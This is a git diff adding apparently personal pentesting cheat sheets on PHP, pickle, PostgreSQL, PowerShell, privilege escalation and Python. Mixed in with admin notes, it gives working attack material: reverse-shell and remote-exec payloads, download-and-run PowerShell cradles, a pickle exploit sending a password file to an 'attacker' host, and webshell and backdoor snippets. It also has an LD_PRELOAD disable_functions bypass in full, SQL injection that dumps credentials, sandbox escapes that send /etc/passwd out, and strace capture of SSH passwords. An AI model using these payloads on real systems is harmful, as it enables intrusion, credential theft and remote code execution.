+https://github.com/80vul/phpcodz
+
+# simple php standalone web server
+php -S localhost:8000 -t public_html/
+
+# operator == (type confusion)
+https://habnab.it/php-table.html
+http://gynvael.coldwind.pl/?id=492
+https://docs.google.com/spreadsheets/d/1oWsmTvEZcfgc_1QkBczNGA3Gcffg_pmgKcak7iZldUw/pub?output=html
+
+# magic hashes
+https://www.whitehatsec.com/blog/magic-hashes/
+https://md5db.net/explore/0E56
+https://github.com/spaze/hashes
+
+# integer key truncation
+https://www.sektioneins.de/blog/15-08-03-php_challenge_2015_solution.html
+bug: converting 4294967296 (0x100000000) to 32-bit is 0 so different arrays compare identical: ["4294967296 "=>"5" , "1"=>"mypw"] === ["0"=>"5","1"=>"mypw"] => true
+and also changing POST json ["1234","seb","oldpw","newpw"] to {"4294967296":"1234","1":"seb","2":"oldpw","3":"newpw"} will update pw of uid account 0
+because "update users set pw='${input[3]}' where uid='${input[0]}'") => update ... where uid='' (same as uid=0) because $input[0] => NULL (on unpatched php versions)
+
+# configuration audit hardening
+https://www.sektioneins.de/en/blog/14-08-21-php-secure-configuration-checker.html
+
+# determiner la version
+form.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
+form.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
+
+http://www.0php.com/php_easter_egg.php
+
+# see what modules are enabled
+php -m
+
+# opcache bypass write restrictions to webroot by overwrite cached index.php.bin
+http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/
+
+# preg_replace
+preg_replace($_GET["find"], $_GET["replace"], $unknown); exploit with find=//e&replace=`ls`
+
+preg_replace($_GET['ville'], $_GET['ville'], urldecode($_SERVER['REQUEST_URI']));
+curl 'http://10.0.0.1/demo/preg_replace.php?ville=`socat+exec:sh+tcp:10.10.220.211:8888`/e%00'
+curl 'http://10.0.0.1/demo/preg_replace.php?ville=print+2;%23/e%00'
+curl 'http://10.0.0.1/demo/preg_replace.php?ville=%23(.*)|%0aeval($_GET\[3\]);%23/e%00&3=system(%22id%22);' 
+
+preg_replace('/' . $_GET['find'] . '/i', $_GET['replace'], $unknown) -> ?find=blah/e%00 PHP>=5.4.6 do not allow null byte in preg_replace anymore
+
+PHP since 7.0 doesn't allow code execution in preg_replace at all
+
+# unserialize RCEs
+http://vagosec.org/2013/09/wordpress-php-object-injection/
+http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/
+
+# unserialize / object injection 101
+http://securitycafe.ro/2015/01/05/understanding-php-object-injection/
+http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing
+https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/ (the guy who makes RIPS) and http://ebrietas0.blogspot.fr/2015/08/magento-bug-bounty-1-2-csrf-to-code.html
+
+# lulz
+PCRE_REPLACE_EVAL has been deprecated as of PHP 5.5.0
+NULL byte poisoning was fixed as of PHP 5.3.4
+
+# security best practice
+http://thisinterestsme.com/php-best-practises/
+http://stackoverflow.com/questions/3115559/exploitable-php-functions
+
+# static analysis
+http://rips-scanner.sourceforge.net/
+
+# pour ne pas renvoyer le X-Powered-By: PHP/5.2.9 dans les entetes HTTP
+expose_php = Off
+
+# magic quotes gpc (formation HSC)
+gpc=get post cookie
+
+application systematique de la fonction addslashes sur les var GET POST COOKIE
+magic_quotes_gpc ne fait rien d'autre que d'appeler addslashes (qui n'echape que ', ", NUL).
+ph34r les caractères multi-octets 
+
+meme activé, sqli reste possible si
+- entier: WHERE id = $GET["id"]
+- app err: WHERE url = '".urldecode($GET["url"])
+
+C'est l'application qui doit valider les entrées. 
++ is_int + intval, is_float ...
++ whitelist (in_array, regex)
++ mysql_real_escape_string
++ sql prepared statements (client-side ou server-side): plus besoin d'appeler mysql_real_escape et cie
+
+# (int) ou intval()
+intval fait au mieux eg. 123abc => 123
+vaut mieux faire is_int puis (int) sinon renvoyer 0
+
+# configuration secure
+display_errors = Off
+error_reporting = E_ALL
+log_error = On
+#error_log
+html_errors = Off
+register_globals = Off
+register_argc_argv
+variables_order = "GPCS"
+session.use_trans_sid = 0
+session.use_only_cookies = 1
+session.use_trans_sid = 0
+session.cookie_lifetime = 7200
+session.auto_start = 0
+session.cache_limiter = nocache
+session.cookie_httponly = 1
+session.bug_compat_42 = 0
+
+# filters
+<?php include "data://text/plain;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pgo="; ?>
+
+# backdoors / webshells
+* htaccess
+<Files ~ "^.ht.*$">
+order deny,allow
+allow from all
+</Files>
+AddType application/x-httpd-php .htaccess
+AddHandler x-httpd-php .htaccess
+php_flag engine on
+#<?phpinfo();?>
+
+* extract
+@extract($_REQUEST);
+@die($ctime($atime));
+http://...?ctime=system&atime=id
+
+* simple
+<?php $_GET['a']($_GET['b']); ?>
+
+# build httpd + php with support for mysql, oci and mssql
+~/code/src/php-5-3.10 $ ./configure  --prefix=/opt/m/php/php-5.3.10 --with-apxs2=/opt/m/httpd/httpd-2.4.1/bin/apxs --with-oci8=shared,/u01/app/oracle/product/11.2.0/xe --with-mysql=mysqlnd --with-mssql=/home/seb/code/src/freetds-0.91/opt/
+
+# php tricks
+# http://www.php.net/manual/en/ini.list.php
+# http://www.php.net/manual/en/configuration.changes.php
+print_r(ini_get_all());
+ini_set('display_errors', '1');
+
+* howto use pcntl_exec
+$args = array('-c', $_POST['c']);
+print_r($args); // next line would return HTTP 500 without this line (?!)
+pcntl_exec('/bin/bash', $args);
+
+* howto use proc-open
+https://github.com/p4-team/ctf/tree/master/2017-12-09-seccon-quals/web_automatic
+
+* bypass disable_functions by overwriting memory through the procfs - plaidctf-2014 nightmares
+http://www.reddit.com/r/netsec/comments/2tyh93/php_disable_functions_procfs_bypass_ru/
+
+* bypass disable_functions via putenv() LD_PRELOAD and mail(). Need to upload .so and .php (see 0ctf-2016 guestbook https://blog.ka0labs.net/post/33/ or alictf-2016 homework https://github.com/tothi/ctfs/tree/master/alictf-2016/homework)
+upload a.so:
+# compile with gcc -c -fPIC a.c -o a.o && gcc a.o -shared -o a.so
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+int getuid ()
+{
+  char * en;
+  char * buf = malloc(300);
+  FILE * a;
+  unsetenv( "LD_PRELOAD");
+  a = fopen( "/tmp/cmd.txt", "r");
+  buf = fgets(buf, 100, a); // or buf = getenv("_evilcmd");
+  write(2, buf, strlen(buf)); // optional?
+  fclose(a);
+  remove("/tmp/cmd.txt");
+  rename("/var/www/a.so", "/var/www/b.so"); // shouldnt be required (we already unsetenv)
+  buf = strcat(buf, "> /tmp/out.txt");
+  system(buf);
+  rename( "/var/www/b.so", "/var/www/a.so");// shouldnt be required
+  free(buf);
+  return 0;
+} 
+upload blah.php:
+<?php putenv("LD_PRELOAD=/var/www/a.so");
+  $a = fopen("/tmp/cmd.txt", "w");
+  fputs($a, $_GET["cmd"]);
+  fclose($a); // or use putenv("_evilcmd=$_GET['cmd']");
+  mail("a@example.com", "", "", "");
+  $a = fopen("/tmp/out.txt", "r");
+  while (!feof($a))
+  {$b = fgets($a); echo $b;}
+  fclose($a); // or use show_source("/tmp/out.txt");
+?>
+
+* bypass __wakeup()
+https://bugs.php.net/bug.php?id=72663
+
+requests.get('http://127.0.0.1:1234/?data=' + quote('a:2:{i:0;O:6:"HITCON":3:{s:14:"\x00HITCON\x00method";s:4:"show";s:12:"\x00HITCON\x00args";a:1:{i:0;s:17:"orange\' sqli here";}s:12:"\x00HITCON\x00conn";47:{a:1:{i:0;O:9:"Exception":2:{s:7:"\x00*\x00file";R:4;}}i:1;R:4;}'))
+
+* bypasss verify hostname by parse_url https://bugs.php.net/bug.php?id=73192
+parse_url('http://example.com/#@google.com/')['host'] -> google.com
+
+* bypass parse_url
+parse_url('http://upload/?/path/to/blah') -> {'host': 'upload?', 'path': '/path/to/blah'}
+
+* bypass preg_match('/^.*information_schema.*$/is', arg)
+with arg = "' union select table_name from information_schema.tables#".str_repeat('a', 1000000);
+
+# php-cgi
+http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
+http://vuln.lol/path/?-s
+curl -v 'http://vuln.lol/path/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input' -d '<?php system("sleep 30");die(); ?>'
+http://vuln.lol/cgi-bin/php/...
diff --git a/Cheat Sheet/pickle b/Cheat Sheet/pickle
new file mode 100644
index 0000000..ffc50aa
--- /dev/null
+++ b/Cheat Sheet/pickle	
@@ -0,0 +1,11 @@
+# pickle
+
+# rce
+curl -v http://localhost:9020 -d $'; job: cos\nsystem\n(S\x27cat /tmp/key>/tmp/weshbienjoue\x27\ntR.\x27\ntR.'
+// or
+class Job(object):
+  def __init__(self):
+    subprocess.Popen(['curl', 'http://attacker/', '-F', 'key=@/home/level06/.password'])
+
+payload = 'wesh; job: %s' % pickle.dumps(Job()) # we inject before so that the second job is ignored "type: JOB; data: ; job: <payload>; job: <pickle-dumped job variable>"
+urllib.urlopen('http://localhost:9020/', data=payload)
diff --git a/Cheat Sheet/png b/Cheat Sheet/png
new file mode 100644
index 0000000..fe74cef
--- /dev/null
+++ b/Cheat Sheet/png	
@@ -0,0 +1,10 @@
+# png
+
+# apt-get install pngcheck
+pngcheck -vt ctf.png
+
+# apt-get install pngtools
+pngchunks ctf.png
+
+# use pngsplit to extract every chunks
+
diff --git a/Cheat Sheet/postfix b/Cheat Sheet/postfix
new file mode 100644
index 0000000..28d3f07
--- /dev/null
+++ b/Cheat Sheet/postfix	
@@ -0,0 +1,7 @@
+# postfix
+
+# afficher un mail dans la queue
+postcat -q ABCDEF1234
+
+# supprimer un mail de la queue
+postsuper -d ABCDEF1234
diff --git a/Cheat Sheet/postgres b/Cheat Sheet/postgres
new file mode 100644
index 0000000..7e064a0
--- /dev/null
+++ b/Cheat Sheet/postgres	
@@ -0,0 +1,59 @@
+# postgres
+
+# SQLi-fu
+
+* fast exploitation in PosgreSQL >= 9.0 using string_agg function
+id=-1 union select null,string_agg(login||chr(58)||pass,chr(44)) from users;
+id |              news
+---+---------------------------------------
+   | admin:P@ssw0rd,root:Qwerty1,test:test123
+(1 row)
+
+* error based
+select * from news where id=1 and (select box(login||chr(58)||pass) from users) is not null; # also works with: circle, ilne, lseg, path, point, polygon instead of box
+
+1=cast((select table_name from information_schema.tables limit 1 offset 0) as int) => invalid input syntax for integer: "pg_type"
+1=cast((select usename from pg_shadow limit 1 offset 0) as int)
+1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
+
+* time based blind
+ProductID = 1;SELECT pg_sleep(25)--
+ProductID = 1);SELECT pg_sleep(25)--
+ProductID = 1';SELECT pg_sleep(25)--
+ProductID = 1');SELECT pg_sleep(25)--
+ProductID = 1));SELECT pg_sleep(25)--
+ProductID = 1'));SELECT pg_sleep(25)--
+ProductID = SELECT pg_sleep(25)--
+
+# usage
+* lister les databases
+psql -l -U postgres
+
+* pour se connecter depuis localhost, il faut soit etre dans le groupe postgres soit etre l'utilisateur postgres ou root
+psql -U postgres
+
+* creer une bdd "test"
+createdb -U postgres -W test
+
+* supprimer la bdd test
+dropdb -U postgres -W test
+
+* creer un superuser
+createuser -a -d -P -E -U postgres -W chris
+
+* creer un user standard
+createuser -A -D -P -E -U chris -W testuser
+
+* creer une bdd owned par testuser
+createdb -O testuser -U chris -W MyDB
+
+* se connecter
+psql -U testuser -W MyDB
+
+# ezpublish
+$ createuser -a -d -P -E -U postgres ezpublish_user
+Enter password for new role: 
+Enter it again: 
+
+$ createdb -O ezpublish_user -U postgres ezpublish_db
+
diff --git a/Cheat Sheet/powershell b/Cheat Sheet/powershell
new file mode 100644
index 0000000..83400a8
--- /dev/null
+++ b/Cheat Sheet/powershell	
@@ -0,0 +1,77 @@
+# powershell
+
+http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
+
+http://code.google.com/p/nishang/
+https://github.com/mattifestation/PowerSploit and https://github.com/obscuresec/PowerSploit (contributor)
+
+https://github.com/darkoperator Posh-SecMod
+
+http://securitypadawan.blogspot.com.au/2013/07/authenticated-metasploit-payloads-via.html
+there also should be metasploit module also to fire up a reverse shell via powershell
+
+see ./bypass_av
+
+# AMSI / Windows 10
+http://www.labofapenetrationtester.com/2016/09/amsi.html
+
+# recon
+* obtain list of Windows XP
+Get-ADComputer -filter {OperatingSystem -like "*XP*"}
+
+# port scan
+http://webstersprodigy.net/2013/07/01/powershell-portscanner/
+
+# learn
+http://mohd-akram.github.io/2013/05/16/a-python-developers-guide-to-powershell
+
+get-command or gcm (alias) # list all cmdlets
+
+# PowerSploit
+Import-Module .\PowerSploit
+Get-Command -Module PowerSploit
+Get-Help Invoke-ReflectivePEInjection
+
+# Reflective DLL Injection
+premiere version par Stephen Fewer
+amelioration par Joe Bialek
+incorpore dans PowerSploit
+
+# basics
+PS c:\> $psversiontable # if nothing comes back it's powershell v1
+or just run: get-host # works on all versions
+
+# remote
+WinRM / PowerShell Remoting service port 47001
+WinRM 5985 (HTTP) and 5986 (HTTPS)
+
+# complete security audit of Windows host
+http://poshcode.org/639
+
+# bypass Execution Policy
+https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-execution-policy
+
+random blog: Set-ExecutionPolicy Unrestricted -force'
+michele: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://172.16.37.1/XYZ/ps.png')); Invoke-CICCIO.
+
+Carnal0wnage (http://carnal0wnage.attackresearch.com/2015/03/powershell-ad-recon-by-pyrotek3.html)
+powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"
+
+Sometimes I also base64-encode the "stager" and use EncodedCommand.
+
+Nice read about this: http://www.exploit-monday.com/2014/04/powerworm-analysis.html
+
+As a payload, I recently switched to this (as it's automatically compatible with x86 and also x86_64 without the need for you to do fingerprinting):
+https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
+
+# Executes PowerShell from an unmanaged process
+https://github.com/leechristensen/UnmanagedPowerShell/tree/master
+
+# metasploit powershell session
+https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/
+
+# LLMNR/NBT-NS poisoning
+https://github.com/Kevin-Robertson/Inveigh
+
+# http://expertmiami.blogspot.com.au/2015/07/the-avast-series.html
+avastBHO.SwitchToSafezone('\\..\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c "cd %TEMP%&PowerShell (New-Object System.Net.WebClient).DownloadFile(\'http://192.168.233.1:8001/stage1.exe/',\'stage1.exe\');(New-Object -com Shell.Application).ShellExecute(\'stage1.exe\');"')
diff --git a/Cheat Sheet/privesc b/Cheat Sheet/privesc
new file mode 100644
index 0000000..906c4b4
--- /dev/null
+++ b/Cheat Sheet/privesc	
@@ -0,0 +1,303 @@
+# privilege escalation privesc
+
+http://pwnwiki.io
+
+# windows
+https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit
+http://www.networkpentest.net/p/windows-command-list.html
+
+date /t & time /t
+net time \\computername
+
+whoami /all
+ver
+set
+systeminfo | findstr /r /c:"^Host Name" /c:"^OS Name:" /c:"^OS Version:" /c:"^System Type:"
+PS C:\> $PSVersionTable.BuildVersion
+
+fsutil fsinfo drives
+fsutil volume diskfree c: # or dir c:\
+
+netsh int ip show config
+netsh wlan export profile key=clear
+type %systemroot%\system32\drivers\etc\hosts
+ipconfig /displaydns # client dns cache
+nbtstat -c # netbios name cache
+
+netstat -anb
+netstat -a -n -p tcp | find "ESTAB"
+netstat -a -n -p tcp | find "LISTEN"
+netstat -a -n -p udp
+netstat -rn
+
+wmic computersystem get Name, domain, Manufacturer, Model, NumberofProcessors, PrimaryOwnerName,Username, Roles, totalphysicalmemory /format:list
+wmic process list full
+more at http://translate.wooyun.io/2015/10/10/WMI-Attacks.html
+
+net accounts /domain # pw policy for the domain
+
+net share # list of shares on the server
+net view \\computername # list of shares on a remote computer 
+net session # list SMB sessions of users connected to the server
+net file # list of open shared files on the server
+
+reg query hklm\system\currentcontrolset\control\lsa # stores LM hashes
+nbtstat -A <IP>
+net config workstation or server # view the domain name of current machine
+reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DCName # view the name of the domain controller
+
+net view # list computers
+net computers # list computers
+net view /domain # list all domains available to the host
+net view /domain:otherdom
+net view /domain:dom # list hosts that exist on the domain
+net group "Domain Computers" /domain
+
+for /f %i in (hosts.txt) do @(net view \\%i >> shares.txt 2>nul) # list active shares
+index all avail shares with Recoll (docx, zip, etc.) (http://hackerforhire.com.au/post-exploitation-finding-passwords-in-haystacks/)
+
+qwinsta or query session /server:computername /counter # list RDP sessions
+reg query "[\\machine\]hklm\software\microsoft\windows nt\currentversion\profilelist" /s | findstr /i "profileimagepath" # view recent logons or even simpler: dir /od \users
+reg query "hklm\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount" # entry might not exist. creds are in hklm\security\cache
+
+reg.exe query HKU # list of users currently logged in
+reg.exe query HKUS-1-5-21-... then need to find a way to resolve sids on the cmdline
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f # enable remote desktop
+
+systeminfo # but doesnt list all KBs
+wmic qfe list # lists installed security patches
+wmic qfe get Caption,Description,HotFixID,InstalledOn
+reg save HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates updates.reg
+wusa /uninstall /kb:<kbnum> # uninstall patch
+msinfo32 (GUI) ou msinfo32 /report msinfo.txt (CLI) # used to be winmsd.exe
+
+wmic /node:ip /user:u /password:p product get name /value # list installed programs
+wmic /node:@ips.txt /user:u /password:p product where name="program" call uninstall /INTERACTIVE:OFF # uninstall program
+
+PsInfo # list of all hostfixes, uptime etc.
+PsSid
+
+powershell -Command Get-ChildItem -Recurse Cert: | findstr -i Superfish 
+
+tasklist /svc
+tasklist /v /fo list
+taskkill /f /im "cmd.exe" # killall
+net start or sc query or sc queryex
+sc query state= all
+sc stop aZeI
+sc delete aZeI
+del /F c:\zbSJCelh.exe
+
+qprocess /server:computername *
+tasklist /v /s computername
+
+net statistics workstation # uptime
+task manager -> performance # uptime for windows 2008
+
+tree c:\ /f /a 
+dir /od # ls -ltr
+
+dir /a /s *assw* # find interesting files
+findstr /i /s password * # find interesting strings in files
+dir c:\*vnc.ini /s /b
+dir c:\*ultravnc.ini /s /b
+dir c:\ /s /b | findstr /si *vnc.ini
+findstr /si password *.txt | *.xml | *.ini
+findstr /si pass *.txt | *.xml | *.ini
+reg query HKLM /f password /t REG_SZ /s
+reg query HKCU /f password /t REG_SZ /s
+reg query HKLM\SYSTEM\Current\ControlSet\Services\SNMP
+passhunt.exe -r "domain.(foo|bar)" -x c:\windows
+passhunt.exe -r "/user:" -x c:\windows
+panhunt.exe
+
+C:\unattend.xml / post/windows/gather/enum_unattend
+C:\sysprep.inf [clear]
+C:\sysprep\sysprep.xml
+%WINDIR%\Panther\Unattend
+msf auxiliary/dcerpc/windows_deployment_services
+
+https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
+msf exploit/windows/local/trusted_service_path # unquoted service exes
+msf exploit/windows/local/service_permissions
+msf exploit/windows/local/always_install_elevated
+
+accesschk.exe -uwcqv "testuser" * # registry perms
+accesschk.exe -uwqs users c:\
+calcs "c:\Program Files" /T | findstr Users
+icacls \\hackmedc\docs # determine perms
+
+gpresult /z /h outputfile.html # view GPOs that have been applied to a system
+gpresult /R
+gpresult /Z # verbose
+
+find machines with the gpp (http://www.harmj0y.net/blog/powershell/gpp-and-powerview/)
+
+netsh firewall show state
+netsh advfirewall show allprofiles
+netsh firewall set opmode disable|enable
+
+(gwmi -q 'select * from SoftwareLicensingService').OA3xOriginalProductKey # Windows OEM product key
+
+* list all *.msc progs
+dir c:\windows\system32 | findstr msc
+mmc
+gpedit.msc 
+
+autoruns
+sigverif # verif des signatures
+
+* bonus tips
+color 0a
+type \\.\c:\wfmgr.cfg
+psinfo # shows uptime
+xcopy srcdir dstdir /E # cp -r
+
+* am i admin
+dir \\DC\C$
+at \\DC # list scheduled tasks
+
+* moar
+Network Intrusion Process https://scriptjunkie.us/files/networkintrusionpostermed.png
+Build a Secure Network by Matt Weeks @scriptjunkie http://www.irongeek.com/i.php?page=videos/derbycon3/4101-pigs-don-t-fly-why-owning-a-typical-network-is-so-easy-and-how-to-build-a-secure-one-matt-scriptjunkie-weeks (DerbyCon 2013)
+Encyclopedia of Windows Privilege Escalation by Brett Moore (Insomnia) http://www.youtube.com/watch?v=kMG8IsCohHA (Ruxcon 2011)
+The Dirty Little Secrets They Dont Teach You In Pentesting Class, Rob Fuller Chris Gates, part2: https://www.youtube.com/watch?v=JKcs2VuTSJg (DerbyCon 2012) & part1 but p basic: https://www.youtube.com/watch?v=xXqyogdxITE (DerbyCon 2011)
+Exploiting weak folder permissions http://www.greyhathacker.net/?p=738
+Pwn .bat admin scripts that expand %CD% in a directory under our control http://thesecurityfactory.be/command-injection-windows.html
+
+* summary
+http://www.r00tsec.com/2014/10/howto-summary-privilege-escalation.html
+https://www.sock-raw.org/wiki/doku.php/windows_priv_esc
+
+* extract passwords
+http://www.nirsoft.net/utils/bullets_password_view.html
+http://aluigi.altervista.org/pwdrec.htm
+
+* EoP
+https://github.com/koczkatamas/CVE-2016-0051
+
+# linux
+id
+uname -a
+w
+who # usernames not truncated
+last | head -n 50
+last -w
+sudo -l
+getent passwd
+env
+uptime
+
+/etc/passwd
+/etc/shadow
+/etc/group
+/etc/sudoers
+/etc/ssh/sshd_config
+/etc/fstab
+/etc/mtab
+/proc/mounts
+/etc/exports
+/etc/syslog.conf
+/etc/rsyslog.conf
+/etc/issue,motd,system-release,redhat-release,centos-release,lsb-release,os-release,debian_version,SuSE-release, ...
+/etc/cron*
+/etc/anacrontab
+/var/spool/cron* # may vary
+/etc/inetd.conf
+/etc/xinetd.conf
+/etc/sysconfig/iptables # may vary
+
+hostname
+ps fauxww
+ps auxe # show environment
+ifconfig ; ip ad
+netstat -nr
+/etc/hosts
+/etc/resolv.conf
+/etc/nsswitch.conf
+netstat -an
+/proc/net/ip_conntrack
+iptables-save or iptables -S
+
+/proc/version
+/proc/sys/kernel/osrelease
+/proc/sys/kernel/version
+/proc/sys/kernel/hostname
+/proc/sys/kernel/domainname
+/proc/sys/kernel/..
+/proc/net/{tcp,tcp6,udp,unix} | parse_net_tcp.py
+/proc/net/arp # neighbours
+
+/proc/self/environ
+/proc/self/cmdline
+/proc/self/maps
+/proc/self/loginuid
+
+; setuid, setguid files
+find / -type f -perm -4000 \! -type l \! -type b \! -type c \! -type s -ls 2>/dev/null
+find / -type f -perm -2000 \! -type l \! -type b \! -type c \! -type s -ls 2>/dev/null
+
+; world writable
+find / -type f -perm -002  \! -type l \! -type b \! -type c \! -type s -ls 2>/dev/null | grep -v ' /proc/'
+find / -type d -perm -002  -ls 2>/dev/null
+
+; files or groups with no owners
+find / \( -nouser -o -nogroup \) -ls 2>/dev/null
+; symlinks that point to writable file/dir
+
+; find writeable libs called by setuid bins or not
+find / -type f -perm /6000 -exec ls -1 {} \; 2>/dev/null | xargs -i ldd {} | grep -oE '/[^ ]+' | sort -u | xargs ls -Ll | grep -iE '^(....w....|.......w.)'
+
+; find libs with RPATH sections http://seclists.org/fulldisclosure/2010/Oct/257
+while read f; do readelf -d "$f"| grep RPATH && echo "$f" >> /tmp/libs_with_rpath.txt; done < <(find / -type f -perms /6000)
+while read f; do ldd "$f" 2>/dev/null | grep -f /tmp/libs_with_rpath.txt && echo "$f" >> /tmp/bins_with_rpath.txt; done < <(cat /tmp/libs_with_rpath.txt)
+
+; writable outside of the user's HOME
+find / -type f -user $USER -perm /222 -ls 2>/dev/null | grep -vE " (/proc/|$HOME)"
+find / -type d -user $USER -perm /222 -ls 2>/dev/null | grep -vE " (/proc/|$HOME)"
+; only root can read
+find / \( -path /proc -o -path /sys -o -path /dev \) -prune -o -user root ! -perm /004 -ls 2>/dev/null
+
+rpm -qa --last
+
+shellshock
+env x='() { :;}; echo pwn3d' bash -c "blah"
+ssh -o 'rsaauthentication yes’ 192.168.1.1 '() { ignored; }; id'
+
+wildcard attacks https://www.exploit-db.com/papers/33930/
+
+* common paths
+http://wiki.apache.org/httpd/DistrosDefaultLayout, lfipwn/core/techniques/LFIApacheLog.py, exploit-database/platforms/php/webapps/15964.py
+http://www.blackhatlibrary.net/File_Inclusion
+
+* elevate 
+.*history
+.*rc
+.ssh / known_hosts, config, authorized_keys{,2}, id_rsa, id_dsa
+.vnc/passwd
+
+https://github.com/b3rito/yodo
+
+grep .*_history for:
+  rsh, rhost, rcp, ssh, scp, ...
+  su -
+  sudo
+identifier les VIP
+
+local root exploits # look at exploit suggesters in tools/post
+sysdig strace systemtab # in tools/post/
+
+backdoor su, sudo, ...
+capture ssh passwords: sudo strace -f -e read -p <pid_of_sshd> 2>log OR strace -e write -p <pid_of_sshd> 2>&1 | egrep "^write\(.*1\)"
+prettier: strace -p 13909 2>&1 | awk '/^write\(.*1\)/ {gsub(/\"/, "");gsub(/\,/, "");gsub(/\\r/, "\\n");sub(/[0-9]*\)/," ",$2);sub(/\\177/,"\b",$2);sub(/\\t/,"\t",$2);sub(/\\3/,"\^C",$2);printf $2}'
+or python script skl.py from netspi
+
+look into tools/* (eg. lynis)
+
+http://netsec.ws/?p=309 # LinEnum, LinuxPrivChecker, g0tmi1k's blog (http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
+
+# bypassing nosuid, noexec
+CVE-2014-5206/CVE-2014-5207 http://seclists.org/oss-sec/2014/q3/352
+
+# Solaris
+dispuid # display a list of all valid user names
diff --git a/Cheat Sheet/proftpd b/Cheat Sheet/proftpd
new file mode 100644
index 0000000..5730304
--- /dev/null
+++ b/Cheat Sheet/proftpd	
@@ -0,0 +1,4 @@
+# proftpd
+
+* CVE-2015-3306
+http://bugs.proftpd.org/show_bug.cgi?id=4169
diff --git a/Cheat Sheet/prssi b/Cheat Sheet/prssi
new file mode 100644
index 0000000..f86da93
--- /dev/null
+++ b/Cheat Sheet/prssi	
@@ -0,0 +1,5 @@
+# prssi (Path-Relative Stylesheet Import) / pro (Relative Path Overwrite)
+
+http://www.thespanner.co.uk/2014/03/21/rpo/
+http://blog.portswigger.net/2015/02/prssi.html real life RPO bug in phpBB
+http://blog.innerht.ml/rpo-gadgets/ bug bounty on google using @import to exfil page contents
diff --git a/Cheat Sheet/python b/Cheat Sheet/python
new file mode 100644
index 0000000..046b07d
--- /dev/null
+++ b/Cheat Sheet/python	
@@ -0,0 +1,117 @@
+# python
+
+# pip
+pip install --user -r requirements.txt 
+PROTOCOL_SSLv3 error: easy_install --upgrade pip
+
+# virtualenv
+virtualenv .venv
+source .venv/bin/activate
+
+# deep
+http://sebastianraschka.com/Articles/2014_deep_python.html
+
+# decompile
+https://github.com/rocky/python-uncompyle6
+https://github.com/zrax/pycdc
+https://www.fireeye.com/blog/threat-research/2016/04/deobfuscating_python.html uncompyle2 or meta https://github.com/wibiti/uncompyle2 http://srossross.github.io/Meta/html/api/decompile.html
+https://github.com/alex/python-decompiler
+https://sourceforge.net/p/pyinstallerextractor/tickets/5/
+https://sourceforge.net/projects/easypythondecompiler/ used in http://security.szurek.pl/blazectf-2016-postboard-writeup.html
+
+# sandox escape / breaking out of restricted environments
+http://tomforb.es/breaking-out-of-secured-python-environments
+raise BaseException()
+enumerate attributes
+ - use the __dict__ attribute on any class (obvious to restrict)
+ - dir()
+print exit(dir(x)) if str is restricted, exit() turns its parameters into a string
+func_globals is a "reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined"
+print solve.func_globals["sys"].modules
+for l in solve.func_globals["sys"].modules["io"].FileIO(r'path\to\web.config'): print l
+
+https://doar-e.github.io/blog/2014/04/17/deep-dive-into-pythons-vm-story-of-load_const-bug/
+
+''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
+''.__class__.__mro__[2].__subclasses__()[59].__repr__.im_func.func_globals['__builtins__']['globals']()"
+''.__class__.__mro__[2].__subclasses__()[59].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('curl%20me%20-Ffoo%3d%40/etc/passwd') # bsidessf ctf 2017
+
+python3: bytes(str(__builtins__['__import__'] ('subprocess').check_output('cat'+chr(32)+'...',shell=True))+'\n','utf-8')
+
+# sanbox escape via memory corruption
+https://medium.com/@gabecpike/python-sandbox-escape-via-a-memory-corruption-bug-19dde4d5fea5
+https://conference.hitb.org/hitbsecconf2014ams/materials/D2T1-G-Jacking-AppEngine-based-Applications.pdf
+
+# cool links
+http://www.rafekettler.com/magicmethods.html
+http://www.e-booksdirectory.com/programming.php#python
+
+# dict
+>>> dict(sape=4139, guido=4127, jack=4098) # easier to specify pairs using keyword arguments
+{'sape': 4139, 'jack': 4098, 'guido': 4127}
+
+# module __builtin__
+str() # convertit l'objet en une string
+dir() # affiche les methodes de l'objet
+
+import types
+>>> type(odbchelper) == types.ModuleType
+True
+
+print "\n".join(["%s=%s" % (k, v)  for k, v in os.environ.items()])
+print '\n'.join(sys.modules.keys())
+
+# introspection
+getattr(li, "append")("Moe")
+callable(getattr(object, method))
+import statsout
+
+def output(data, format="text"):
+    output_function = getattr(statsout, "output_%s" % format, statsout.output_text)
+    return output_function(data)
+
+# and / or
+and: 'a' and 'b' and 'c' => 'c' # All values are true, so and returns the last value, 'c'.
+ or: If all values are false, or returns the last value.
+
+# os.path
+split, splitext, join, expanduser, isfile, isdir
